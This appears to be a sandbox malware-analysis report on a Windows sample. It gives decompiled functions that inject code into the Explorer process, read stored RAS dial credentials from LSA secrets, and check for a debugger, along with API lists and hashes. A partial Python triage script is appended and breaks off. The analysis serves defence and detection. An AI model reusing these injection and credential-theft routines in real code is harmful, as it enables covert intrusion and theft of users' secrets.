                                    				union _SID_NAME_USE _v24;
                                    				void* _v28;
                                    				void _v284;
                                    				char _v540;
                                    				void* _t50;
                                    				intOrPtr _t56;
                                    				void* _t60;
                                    
                                    				_v8 = 0;
                                    				_t50 = __eax;
                                    				_push(_t60);
                                    				_push(0x407d81);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t60 + 0xfffffde8;
                                    				E00401AC0(__eax);
                                    				E00402074( &_v8, 0x100);
                                    				_v12 = 0xff;
                                    				if(GetUserNameA(E00401F9C( &_v8),  &_v12) != 0) {
                                    					_v16 = 0xff;
                                    					_v20 = 0xff;
                                    					if(LookupAccountNameA(0, E00401F9C( &_v8),  &_v284,  &_v16,  &_v540,  &_v20,  &_v24) != 0 && IsValidSid( &_v284) != 0) {
                                    						_push( &_v28);
                                    						_push( &_v284);
                                    						L00407B54();
                                    						E00401CAC(_t50, _v28);
                                    						GlobalFree(_v28);
                                    					}
                                    				}
                                    				_pop(_t56);
                                    				 *[fs:eax] = _t56;
                                    				_push(E00407D88);
                                    				return E00401AC0( &_v8);
                                    			}

                                    Instruction addresses: 0x00407cb8 0x00407cbb 0x00407cbf 0x00407cc0 0x00407cc5 0x00407cc8 0x00407ccd 0x00407cda 0x00407cdf 0x00407cfa 0x00407cfc 0x00407d03 0x00407d36 0x00407d4b 0x00407d52 0x00407d53 0x00407d5d 0x00407d66 0x00407d66 0x00407d36 0x00407d6d 0x00407d70 0x00407d73 0x00407d80

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                    • LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                    • IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                    • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                    • GlobalFree.KERNEL32(?), ref: 00407D66
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Name$AccountConvertFreeGlobalLookupStringUserValid
                                    • String ID:
                                    • API String ID: 1214381313-0
                                    • Opcode ID: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction ID: cb8f30fe2752fb84fa2a751701b307f0b12e4b3c054cd12de1de141c6e833035
                                    • Opcode Fuzzy Hash: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction Fuzzy Hash: 0A214F71D0420DABDB11EFA1CD829EFB7BCAF08304F504577B500F2191EB38AB458A69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 63%
                                    			E0040AFB0(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				intOrPtr _t49;
                                    				void* _t55;
                                    
                                    				_v20 = 0;
                                    				_v16 = 0;
                                    				_push(_t55);
                                    				_push(0x40b062);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t55 + 0xfffffff0;
                                    				E004013A4(0,  &_v16);
                                    				_t52 = E00401F48(_v16);
                                    				GetWindowThreadProcessId(FindWindowA("Shell_TrayWnd", 0),  &_v8);
                                    				_t37 = OpenProcess(0x1f0fff, 0, _v8);
                                    				E00401CAC( &_v20, _t17);
                                    				_v12 = E0040AEBC(_t22, E00401D50(_v20), _t52);
                                    				E0040AF08(_t37, E0040AEBC(_t37, 4,  &_v12), E0040AE94);
                                    				_pop(_t49);
                                    				 *[fs:eax] = _t49;
                                    				_push(E0040B069);
                                    				return E00401AE4( &_v20, 2);
                                    			}

                                    Instruction addresses: 0x0040afba 0x0040afbd 0x0040afc2 0x0040afc3 0x0040afc8 0x0040afcb 0x0040afd3 0x0040afe0 0x0040aff3 0x0040b008 0x0040b00f 0x0040b027 0x0040b042 0x0040b049 0x0040b04c 0x0040b04f 0x0040b061

                                    APIs
                                      • Part of subcall function 004013A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,00406A79,00000000,00406ABE,?,?,?,?,00000000), ref: 004013C8
                                    • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 0040AFED
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040AFF3
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,0040B062), ref: 0040B003
                                      • Part of subcall function 0040AEBC: VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 0040AED4
                                      • Part of subcall function 0040AEBC: VirtualProtectEx.KERNEL32(00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEE5
                                      • Part of subcall function 0040AEBC: WriteProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000040,00000040,00000000,00000000,00000000,00003000,00000040), ref: 0040AEF3
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000), ref: 0040AF20
                                      • Part of subcall function 0040AF08: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,?,00000000), ref: 0040AF4A
                                      • Part of subcall function 0040AF08: VirtualAllocEx.KERNEL32(00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF59
                                      • Part of subcall function 0040AF08: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000,?,00000000), ref: 0040AF6C
                                      • Part of subcall function 0040AF08: WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,00003000,00000040,00000000,?,00000000,00008000), ref: 0040AF74
                                      • Part of subcall function 0040AF08: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000), ref: 0040AF95
                                      • Part of subcall function 0040AF08: CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0040AF9B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessVirtual$HandleModule$AllocMemoryThreadWindowWrite$CloseCreateFileFindFreeNameOpenProtectRemote
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 1977168033-2988720461
                                    • Opcode ID: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction ID: a49b11f00c6fdd64156e7e0e0219d8fdfe2ddc0dda215ebd071a12db30bd13ac
                                    • Opcode Fuzzy Hash: a52c62318053698575c4eba3688c10b841fefbfd621b91d5bb385f6faa68fac7
                                    • Instruction Fuzzy Hash: 8C116D70B502086BDB01EBB58C42A9E76A8EB48704F60497AB410F73D1EA789E04879C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 45%
                                    			E00407E40(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                    				signed short* _v8;
                                    				intOrPtr _v12;
                                    				char _v16;
                                    				void* _t23;
                                    				intOrPtr _t50;
                                    				intOrPtr _t58;
                                    				void* _t59;
                                    
                                    				_t59 = __eflags;
                                    				_t55 = __esi;
                                    				_t54 = __edi;
                                    				_t41 = __ebx;
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(_t58);
                                    				_push(0x407ef8);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t58;
                                    				_push("RasDialParams!");
                                    				E00407CAC( &_v16, __ebx, __ecx);
                                    				_push(_v16);
                                    				_push(0x407f24);
                                    				E00401E10();
                                    				_t23 = E00407DD0(4,  &_v8, _v12, _t59);
                                    				_t60 = _t23;
                                    				if(_t23 != 0) {
                                    					E00407B94(_v8[2], __ebx,  *_v8 & 0x0000ffff, __edi, __esi);
                                    					_push(_v8[2]);
                                    					L00407B74();
                                    				}
                                    				if(E00407DD0(4,  &_v8, "L$_RasDefaultCredentials#0", _t60) != 0) {
                                    					E00407B94(_v8[2], _t41,  *_v8 & 0x0000ffff, _t54, _t55);
                                    					_push(_v8[2]);
                                    					L00407B74();
                                    				}
                                    				_pop(_t50);
                                    				 *[fs:eax] = _t50;
                                    				_push(E00407EFF);
                                    				return E00401AE4( &_v16, 2);
                                    			}

                                    Instruction addresses: 0x00407e40 0x00407e40 0x00407e40 0x00407e40 0x00407e43 0x00407e45 0x00407e47 0x00407e4b 0x00407e4c 0x00407e51 0x00407e54 0x00407e57 0x00407e5f 0x00407e64 0x00407e67 0x00407e74 0x00407e84 0x00407e89 0x00407e8b 0x00407e99 0x00407ea4 0x00407ea5 0x00407ea5 0x00407ebe 0x00407ecc 0x00407ed7 0x00407ed8 0x00407ed8 0x00407edf 0x00407ee2 0x00407ee5 0x00407ef7

                                    APIs
                                      • Part of subcall function 00407CAC: GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                      • Part of subcall function 00407CAC: LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                      • Part of subcall function 00407CAC: IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                      • Part of subcall function 00407CAC: ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                      • Part of subcall function 00407CAC: GlobalFree.KERNEL32(?), ref: 00407D66
                                      • Part of subcall function 00407DD0: LsaOpenPolicy.ADVAPI32(00000000,?,00000004), ref: 00407DF8
                                      • Part of subcall function 00407DD0: LsaRetrievePrivateData.ADVAPI32(?,?,?), ref: 00407E17
                                      • Part of subcall function 00407DD0: LsaClose.ADVAPI32(00000000), ref: 00407E2E
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407EA5
                                    • LsaFreeMemory.ADVAPI32(?), ref: 00407ED8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Free$MemoryName$AccountCloseConvertDataGlobalLookupOpenPolicyPrivateRetrieveStringUserValid
                                    • String ID: L$_RasDefaultCredentials#0$RasDialParams!
                                    • API String ID: 3536555734-4131767963
                                    • Opcode ID: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction ID: 051c29abe3561fe595ca9589d677eda25b311890e2a2b38154f2da2c0a53b43f
                                    • Opcode Fuzzy Hash: 7244b0321237c455948edbdb93282e145ed4da0237b3fe86ec9488f9e6135b81
                                    • Instruction Fuzzy Hash: 8911C934A08248AFDB00DB95C942F9DB7F5EB48704F6084F6F900A77D2D638BE05DA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405AD8(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                    				_Unknown_base(*)()* _t6;
                                    				void* _t8;
                                    				void* _t14;
                                    				void* _t15;
                                    
                                    				_t14 = __ecx;
                                    				_t15 = __edx;
                                    				_t8 = __eax;
                                    				_t6 = GetProcAddress(LoadLibraryA("shell32.dll"), "ShellExecuteA");
                                    				return  *_t6(_t8, _t15, _t14, _a12, _a8, _a4);
			}

                                     Instruction addresses (one per statement line above, in order): 0x00405ade, 0x00405ae0, 0x00405ae2, 0x00405af4, 0x00405b0e

                                    APIs
                                    • LoadLibraryA.KERNEL32(shell32.dll,ShellExecuteA), ref: 00405AEE
                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00405AF4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: ShellExecuteA$shell32.dll
                                    • API String ID: 2574300362-4013357483
                                    • Opcode ID: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
                                    • Instruction ID: f0fdb292883bcfe093ec2198a563b102d7430bdd074e61d60e743b8a46e47796
                                    • Opcode Fuzzy Hash: 70672a5890152c1e78ef8b0d6a8ba5b8b829c768844e900c89825be7bf6273f8
                                    • Instruction Fuzzy Hash: 70E086723006143B9710EEDB9C41C9BBBACDEC9B64310C53BB508972519475AD0186F8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E0040562C() {
                                    				void* _t5;
                                    				struct HINSTANCE__* _t6;
                                    				intOrPtr* _t7;
                                    				intOrPtr* _t8;
                                    
                                    				_t5 = 0;
                                    				_t6 = LoadLibraryA("kernel32.dll");
                                    				if(_t6 != 0) {
                                    					_t8 = GetProcAddress(_t6, "IsDebuggerPresent");
                                    					_t7 = _t8;
                                    					if(_t8 != 0) {
                                    						_t5 =  *_t7();
                                    					}
                                    				}
                                    				return _t5;
			}

                                     Instruction addresses (one per statement line above, in order): 0x00405630, 0x0040563c, 0x00405640, 0x0040564d, 0x0040564f, 0x00405653, 0x00405657, 0x00405657, 0x00405653, 0x0040565f

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,00000000,004056C8,00000000,0040B22C,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405637
                                    • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 00405648
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: IsDebuggerPresent$kernel32.dll
                                    • API String ID: 2574300362-2078679533
                                    • Opcode ID: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction ID: 709391d187db73d1dcda7b1af944ced4f983b45a8e89d04e37376b255e5d8423
                                    • Opcode Fuzzy Hash: 0f2c0815cd8c1a43d894b1d06190de4a79993326b8e6ff8f207f4119a9c4f690
                                    • Instruction Fuzzy Hash: 4AD0121634561C2982313CE91C85F275A4CC5C5665799093BB508A2381DDAB4C0559A8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004069E4(void* __ecx, char* __edx) {
                                    				void* _v8;
                                    				char* _t7;
                                    				void** _t11;
                                    
                                    				_t7 = __edx;
                                    				RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, _t11);
                                    				RegDeleteKeyA(_v8, _t7);
                                    				return RegCloseKey(_v8);
			}

                                     Instruction addresses (one per statement line above, in order): 0x004069e6, 0x004069fa, 0x00406a05, 0x00406a15

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 004069FA
                                    • RegDeleteKeyA.ADVAPI32(?), ref: 00406A05
                                    • RegCloseKey.ADVAPI32(00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,?,?,?,00406AF1), ref: 00406A0E
                                    Strings
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004069F0
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteOpen
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\
                                    • API String ID: 3399588633-1337323248
                                    • Opcode ID: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction ID: e40fb9d213039d93dcec3c1e8996a1bef626a17aa7b52359fc93130613ad7c1e
                                    • Opcode Fuzzy Hash: 282679c8ea14fe7c5e13c97754bf3c3aaaeff35f8cdc94346c9d03bd774ac319
                                    • Instruction Fuzzy Hash: FBD0A7B07443003AE110BAD65C83F1B268CC7C8745F10442A7104BB0C2C4789D000579
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405E60(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetWindowsDirectoryA");
                                    				return  *_t3(_t5, _t7);
			}

                                     Instruction addresses (one per statement line above, in order): 0x00405e62, 0x00405e64, 0x00405e76, 0x00405e81

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetWindowsDirectoryA,?,?,00405FAE,00000000,00405FEF), ref: 00405E70
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E76
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetWindowsDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-157430550
                                    • Opcode ID: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction ID: 4b7778617931093bb27523e6f2e67fe50c24fa97b8e3c3713106166120904923
                                    • Opcode Fuzzy Hash: eaea27decea16d5132e662f6b3d6d1e327edaddf7cadff529396c82a7d7f61a7
                                    • Instruction Fuzzy Hash: F7C08CB120162039D9203AF60C82EAB094CCC8426A32008337408F22C284BE0E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E00405E18(void* __eax, void* __edx) {
                                    				_Unknown_base(*)()* _t3;
                                    				void* _t5;
                                    				void* _t7;
                                    
                                    				_t7 = __edx;
                                    				_t5 = __eax;
                                    				_t3 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetSystemDirectoryA");
                                    				return  *_t3(_t5, _t7);
			}

                                     Instruction addresses (one per statement line above, in order): 0x00405e1a, 0x00405e1c, 0x00405e2e, 0x00405e39

                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetSystemDirectoryA,?,?,00405F22,00000000,00405F63), ref: 00405E28
                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00405E2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetSystemDirectoryA$kernel32.dll
                                    • API String ID: 2574300362-261809815
                                    • Opcode ID: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction ID: c580b32cc06898864e96a6d997c1f25460584718cb9bf05ade4b506b0c3faeb4
                                    • Opcode Fuzzy Hash: 47b9e16137c7ae96d6a2bc759c8bd7e7168d98e07d0b0e8878cbeb5beabce437
                                    • Instruction Fuzzy Hash: 0AC08CB120162035EA203AF60C8AE9B094CCC8466632008337018F22C384BE4E0000FC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • LoadLibraryA.KERNEL32(?), ref: 24070A9A
                                    • GetProcAddress.KERNEL32(?,2406BFF9), ref: 24070AAF
                                    • VirtualProtect.KERNEL32(24010000,00001000,00000004,?,00000000), ref: 24070B0E
                                    • VirtualProtect.KERNEL32(24010000,00001000), ref: 24070B23
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.545446545.0000000024054000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                     • Associated: 00000005.00000002.545435094.0000000024010000.00000002.00000001.sdmp
                                     • Associated: 00000005.00000002.545510337.0000000024071000.00000004.00000001.sdmp
                                    Similarity
                                    • API ID: ProtectVirtual$AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 3300690313-0
                                    • Opcode ID: 207e314284d24766e709e71cd3f6ddb3aa093c89f9feb9ecd714ec3fcf37e27d
                                    • Instruction ID: fea73935ac89edb1ecb1ad068de3a124fb3e9058189b3824ae919782244a9029
                                    • Opcode Fuzzy Hash: 207e314284d24766e709e71cd3f6ddb3aa093c89f9feb9ecd714ec3fcf37e27d
                                    • Instruction Fuzzy Hash: AB512972A553525AE3118A78CCC0E95BBF0EB42234F180778C6E5C73C7E7A459858B6B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E004058E0(struct tagMSG* __eax) {
                                    				long _t7;
                                    				MSG* _t8;
                                    
                                    				_t8 = __eax;
                                    				_t7 = 0;
                                    				if(PeekMessageA(__eax, 0, 0, 0, 1) != 0) {
                                    					_t7 = 1;
                                    					if(_t8->message != 0x12) {
                                    						TranslateMessage(_t8);
                                    						DispatchMessageA(_t8);
                                    					}
                                    				}
                                    				Sleep(1);
                                    				return _t7;
			}

                                     Instruction addresses (one per statement line above, in order): 0x004058e2, 0x004058e4, 0x004058f6, 0x004058f8, 0x004058fe, 0x00405901, 0x00405907, 0x00405907, 0x004058fe, 0x0040590e, 0x00405917

                                    APIs
                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 004058EF
                                    • TranslateMessage.USER32 ref: 00405901
                                    • DispatchMessageA.USER32 ref: 00405907
                                    • Sleep.KERNEL32(00000001,?,00000000,00405922), ref: 0040590E
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslate
                                    • String ID:
                                    • API String ID: 3768732053-0
                                    • Opcode ID: d6ab4591d5ae237bab473a8afd9d438f801d83b33db59c6d5a5b392af26336c7
                                    • Instruction ID: 6e183c8d27a73f5ab686f93293f9443bc1ab9610ab5d407b35826ec629df393a
                                    • Opcode Fuzzy Hash: d6ab4591d5ae237bab473a8afd9d438f801d83b33db59c6d5a5b392af26336c7
                                    • Instruction Fuzzy Hash: B9E012B13836147DF63079650C83F9F594C8F02B9AF54453BF201BB2C2C5AA5E0041AD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0040BA84(void* __eflags) {
                                    				void* _t7;
                                    
                                    				_t7 = E00403568(0, 0, "_x_X_BLOCKMOUSE_X_x_");
                                    				if(GetLastError() != 0xb7) {
                                    					CloseHandle(_t7);
                                    					return 1;
                                    				} else {
                                    					CloseHandle(_t7);
                                    					return 0;
                                    				}
			}

                                     Instruction addresses (one per statement line above, in order): 0x0040ba93, 0x0040ba9f, 0x0040baac, 0x0040bab4, 0x0040baa1, 0x0040baa2, 0x0040baaa, 0x0040baaa

                                    APIs
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAAC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.544831654.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000005.00000002.544817764.0000000000400000.00000002.00020000.sdmp
                                     • Associated: 00000005.00000002.544862251.0000000000410000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544888619.0000000000414000.00000040.00020000.sdmp
                                     • Associated: 00000005.00000002.544945916.0000000000451000.00000080.00020000.sdmp
                                     • Associated: 00000005.00000002.544973019.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateErrorLastMutex
                                    • String ID: _x_X_BLOCKMOUSE_X_x_
                                    • API String ID: 2372642624-2341447584
                                    • Opcode ID: 1a8c2dc209660b13ed4db7da09b804a36426b86662114a7581cc9a960c290bce
                                    • Instruction ID: d02ee9e762f20a6f0fe939e11bc02ca9e1bd7b756de2d39ced16b1d78259e861
                                    • Opcode Fuzzy Hash: 1a8c2dc209660b13ed4db7da09b804a36426b86662114a7581cc9a960c290bce
                                    • Instruction Fuzzy Hash: 97D0C9A174534035E910B9B51CC3B0E050C875071BFA01837B104BA1D3D67D8601262D
                                    Uniqueness

                                    Uniqueness Score: -1.00%
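
The decompiled stubs above share a handful of behaviours that a triage script can check mechanically: exports such as IsDebuggerPresent and ShellExecuteA resolved at run time through LoadLibraryA/GetProcAddress (E0040562C, E00405AD8, E00405E60, E00405E18), a key under HKCU\Software\Microsoft\Active Setup\Installed Components opened and deleted (E004069E4), LSA private data read after LsaOpenPolicy (the 00407DD0 subcall listed at the top, whose string table names the RAS credential secrets), a CreateMutexA call whose only purpose is the GetLastError == 0xB7 (ERROR_ALREADY_EXISTS) test (E0040BA84), and CreateProcessA with dwCreationFlags = 4 (CREATE_SUSPENDED) in E0040B3C0 below. The following Python is an added example, not part of the Joe Sandbox report and not code from the analysed sample: it parses lines in the report's own "APIs" bullet format and emits one finding per pattern. The input trace is constructed to mirror the bullets on this page (the CreateProcessA line is written out by hand, since the report lists no such bullet for it), and the rule names are my own labels.

```python
"""Triage helper for API-call bullets in the Joe Sandbox 'APIs' format.

Added example: not part of the report and not code from the analysed sample.
Each bullet looks like
    GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 00405648
The rule names used below are my own labels.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed input modelled on the bullets in this report (not a captured trace).
SAMPLE_TRACE = r"""
LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,00000000,004056C8), ref: 00405637
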